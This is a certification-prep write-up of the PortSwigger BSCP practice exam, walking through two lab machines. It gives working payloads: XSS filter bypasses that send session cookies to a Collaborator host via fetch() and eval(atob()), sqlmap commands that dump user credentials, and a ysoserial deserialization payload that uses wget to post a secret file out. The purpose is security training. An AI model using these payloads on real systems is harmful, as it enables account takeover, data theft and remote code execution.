BSCP - unraveling the secrets of certification from PortSwigger Academy

So, let's go!

Let's start with a list of tips that can help you prepare for the exam.

1. It is important to focus on each new functionality at each stage. The same application interface in the lab and exam allows you to quickly identify additional features or differences in functionality at different stages. For example, when you gain access to your account, you may have access to a new site search.

2. Scan using Burp Suite helps in finding entry points into laboratory labs. You can also additionally read the scanning guide on the website PortSwigger.

3. Many things overlap in the exam and in the laboratory, so you should pay attention to searching for documentation and laboratory solutions PortSwigger. Also, of course, there may be topics that were not raised when studying the free material.

4. You shouldn’t spend a lot of time on a dead-end vector and focus on one functionality, since time on the exam is limited.

5. It is necessary to pay special attention to vulnerabilities that may arise at each stage. A list of vulnerabilities specific to each stage will be shown below.

6. The exam instructions contain two dictionaries for selecting user credentials – these dictionaries must be prepared in advance. Since this vulnerability can occur in the exam, this will help save time and nerves.

7. Solve a sufficient number MysteryLabs to formulate an approach to searching for an attack vector.

8. Be sure to pass the recommended laboratory and practice exams.

Let's move on to the exam format

The exam itself lasts 4 hours and consists of two vulnerable machines, which each contain three vulnerabilities and always have the same goals:

1. Gaining access to a low-privileged user account.

2. Elevate privileges to administrator level.

3. Read the file /home/carlos/secret.

The vulnerabilities that can be encountered at each stage look something like this:

Test exam

The test exam, like the real one, consists of two vulnerable applications in which there are six vulnerabilities. Let's start with the solution to the first laboratory machine.

Machine1

Step 1: Gain access to a low-privileged user account

To search for vulnerabilities faster, you can use the built-in Burp Active Scan.

The ActiveScan++ extension adds Burp Suite's active and passive scanning capabilities. It is designed to add minimal overhead to the network and identify application behavior that can help in finding vulnerabilities:

1. Possible attacks on the host header (password reset vulnerabilities, cache contamination, DNS hops).

2. Client-Side vulnerabilities.

3. XML input processing.

4. Suspicious input conversion (for example, 7*7 => '49', \x41\x41 => 'AA').

Identify. Active Scan

When entering the application, we see the usual laboratory interface PortSwigger:

The application has site search functionality, we execute the request and send it for scanning:

The scanner quickly detects a vulnerability, and in this case we are faced with DOM-XSS:

DOM-based XSS vulnerabilities typically occur when JavaScript takes data from an attacker-controlled source, such as a URL, and passes it to a source that supports dynamic code execution, such as eval() or innerHTML. This allows attackers to execute malicious JavaScript code, which typically allows them to take over other users' accounts.

Thus, knowing the weak point of the application and the detected vulnerability, we first select a payload to output data to the page in the browser:

"-prompt(1)-" или "-alert(1)-"

Next we need to try to get our session identifier, and when we try to do this using the usual alert(document.cookie) our action is filtered and returns a response “Potentially dangerous search term”:

In order to get around the limitation, we need to remember what global variables are JavaScript.

A global variable is a variable defined in the context of a global scope. This means that it can be accessed from any other scope, that is, the global variable is available in any part of the code. In JavaScript, it represents a property of a global object.

WAF prevents dangerous filters and tags. Bypass filter WAF possible using global variables JavaScript:

"-alert(window["document"]["cookie"])-" 
"-window["alert"](window["document"]["cookie"])-" 
"-self["alert"](self["document"]["cookie"])-"

It is necessary to select a payload in order to steal the session ID of a regular user. Since input validation does not allow the use of document.cookie, it can be bypassed by using a payload:

"-alert(window["document"]["cookie"])-"

For subsequent operation, you will need to select a design that will send session data to our collaborator:

fetch(`https://COLLAB/?xss=` + window["document"]["cookie"])

After this we need to encode our payload using Base64 encodedwhich will allow us to steal the user's session ID:

Let's use the construction eval(atob()) to bypass filtering and obtain a session identifier, as well as a payload to obtain its own session identifier.

But first, let's figure out how it works:
– The eval() method executes the command from the argument.
– btoa() and atob() methods are used to encode and decode base64 strings.

If the eval() method is blocked, then alternatives can be used:

- setTimeout("code") 
- setInterval("code) 
- Function("code")()

"-eval(atob("ZmV0Y2goYGh0dHBzOi8vY29sbGFib3JhdG9yLz94c3M9YCArIHdpbmRvd1siZG9jdW1lbnQiXVsiY29va2llIl0p"))-"

This payload works correctly and we can get the response back to our server. For subsequent exploitation, we copy the link containing our payload and send it to the user:

As a result, we received a session identifier that can be used for subsequent operation of the application:

Let's use CookieManager, an extension for Firefox, and change our session identifier to the received one:

Thanks to this vulnerability, we gained access to the user carlos. We can move on.

Stage 2: Elevate privileges to administrator level

Let's take the advice from the beginning of the article and pay attention to the new functionality available on behalf of a regular user. In this case, it became possible to use Advanced search:

Let's use it again ActiveScanand it finds a vulnerability in the parameters of this search:

SQL Injection is the process of injecting malicious SQL queries into the input data used by a web application to interact with a database. As a result, you can gain access to confidential data.

When adding a “quote” to this parameter, the site displays an error, based on which we can conclude that there is an SQL query and the potential occurrence of an SQL injection in this place in the application:

The payload to exploit this vulnerability looks like this:

(case when (ASCII(substring(version(),1,1))=103) then author else title end);

This payload compares the value of the first word element in the database to an ASCII table. The application sorts posts in a different order when processing the request correctly.

Read value version() possible using Burp Intruder. We indicate two points in it to search and select an attack Cluster bomb:

Because sqli occurs when sorting posts on a page, let's use Grep Extractlocated in settings Intruder. We indicate the location on the page that changes when the request is executed:

After the end of the attack, you can notice a difference in the position of posts in the responses from the server. This way you can collect the value version() and translate it from ASCII in a readable form to find out the version of the database being used:

For post-exploitation I will use the tool sqlmap.

Sqlmap is an open source tool designed to automate penetration testing. He specializes in discovering and exploiting SQL injection vulnerabilities and hacking database servers. Sqlmap includes a powerful vulnerability detection engine and has a variety of penetration testing features. This tool allows you to solve problems from collecting information about databases to executing commands in the operating system over out-of-band connections.

Command to identify the vulnerability:

sqlmap 'https://0a3300f10317f23b8064f3cd00e40013.web-security-
academy.net/advanced_search?SearchTerm=1&organize_by=1&blogArtist=" --
headers="Cookie:session=ZPXkkGX9QbDGcJoYlNpfqcobNfnkUCUL' -p 'organize_by' -dbms 
postgresql --technique E --level 5

To obtain the administrator password, add several flags to the main command for sqlmap:

sqlmap 'https://0a3300f10317f23b8064f3cd00e40013.web-security-
academy.net/advanced_search?SearchTerm=1&organize_by=1&blogArtist=" --
headers="Cookie:session=ZPXkkGX9QbDGcJoYlNpfqcobNfnkUCUL' -p 'organize_by' -batch 
-D public -T users –-dump

As a result, we receive administrator credentials and can move on to searching for the third vulnerability of this application.

Step 3: Read the /home/carlos/secret file

At this stage, I took one more piece of advice – don’t get hung up and pay attention to everything new that appears in the application. In this case, the only thing that has been updated in the application is the serialized object in the cookies on the now accessible Admin Panel page.

ActiveScan at this time confirms the presence of a vulnerability:

Serialization is the process of converting a data structure into a sequence of bytes. The opposite operation to serialization is deserialization, which consists of restoring the data structure from this sequence of bytes.

To exploit this vulnerability, I recommend using Java Deserialization Scanner:

Java Deserialization Scanner is a Burp Suite extension that provides the ability to detect Java deserialization vulnerabilities. It adds checks to both active and passive scanners and can also be used in manual mode.

This extension allows you to detect and exploit Java deserialization vulnerabilities with various encodings (Raw, Base64, Ascii Hex, GZIP, Base64 GZIP).

A nuance regarding the operation of Java Deserialization Scanner: for this extension to work correctly, you need to install jdk8.

You'll also need to install Ysoserial, a tool that allows you to generate payloads that exploit unsafe deserialization of Java objects.

We use the following payload in Java Deserialization Scanner to exploit the team ysoserial V Java:

CommonsCollections6 'wget http://Collaborator.net --post-file=/home/carlos/secret'

This will allow you to obtain remote code execution (RCE) while deserializing the load on the target system.

We use the Exploiting tab, on which we indicate the location of our serialized object, the command for reading the file, and set the necessary encodings:

We get the flag on the collaborator:

Machine2

Step 1: Gain access to a low-privileged user account

In the second laboratory, we also first check the search functionality using the built-in scanner.

Identify. Active Scan.

We ship to ActiveScan request to use page search and it finds XSS:

In order to get around the restrictions, we will use the payload:

\\"-alert`1`}//

To steal a session identifier, it is necessary to solve the problem with selecting the payload, since in this case the entry of characters is blocked ().

Payload that helps print cookie:

\\"-prompt`${document.cookie}`}//

But I couldn’t find the option to capture a session with it. After researching possible filtering bypasses, I came up with a payload that allows you to bypass bracket filtering:

\\"-setTimeout`alert\x28document.cookie\x29`}//

Session hijacking can be accomplished using a payload on the first vulnerable machine, but the parenthesis occurrences must be corrected:

\\"-setTimeout`fetch\x28'https://collaborator/jsonc="+document.cookie\x29`}//

As a result, we are able to bypass filtering. We add the payload in the link to exploit-server and get the session user ID in the application:

We change our session identifier to the one received using CookieManageras in the first laboratory, and move on to the next stage.

Stage 2: Elevate privileges to administrator level

Here we are again greeted by the advanced search functionality:

Let's use a scanner to find a vulnerability and find out what's here again SQL Injection:

This time it is necessary to bypass also WAF. Let's try to go straight to operation using sqlmap:

sqlmap "https://0ad6004b0366230683962d2b00c10004.web-security-
academy.net/filtered_search?find=qweqwe&organize=5&order=&BlogArtist=" --
headers="Cookie:session=Il6QXQ1lvrgDF6w6Pl2wg6FuteDaRmXP' --dbms postgresql -p 
'order' --level 5  --flush-session --random-agent --technique E

Post-exploitation of this vulnerability using sqlmap does not cause any difficulties, so you can get credentials in the same way as in the first machine:

Step 3: Read the /home/carlos/secret file

The same vulnerability occurs here, related to Java Deserialization. The stages of operation have already been demonstrated, but here I will try to tell you more about Java Deserialization Scanner.

This plugin includes three separate components:
1. Integration with active and passive scanner Burp Suite.
2. Manual tester to detect Java deserialization vulnerabilities in custom insertion points.
3. Ysoserial tool that exploits Java deserialization vulnerabilities [frohoff ysoserial](https://github.com/frohoff/ysoserial).

Such a vulnerability can also be detected using the ActiveScan functionality.

The scanner provides two types of payloads:
1. Payloads that execute a synchronous sleep function to test for vulnerability based on response time from the server.
2. Payloads that resolve DNS to test for vulnerability using Burp Suite Collaborator integrated with Burp Suite.

The exploit is generated using the ysoserial tool, which generates the required payloads. Each CommonsCollection has its own variation of the exploit.

To find the entry point and identify vulnerabilities Java I also used ActiveScan:

We need to identify and determine how exactly the vulnerability works and what payload is needed – this can be done using the scanner built into the extension. In our case, the vulnerability is related to DNS (JRE only):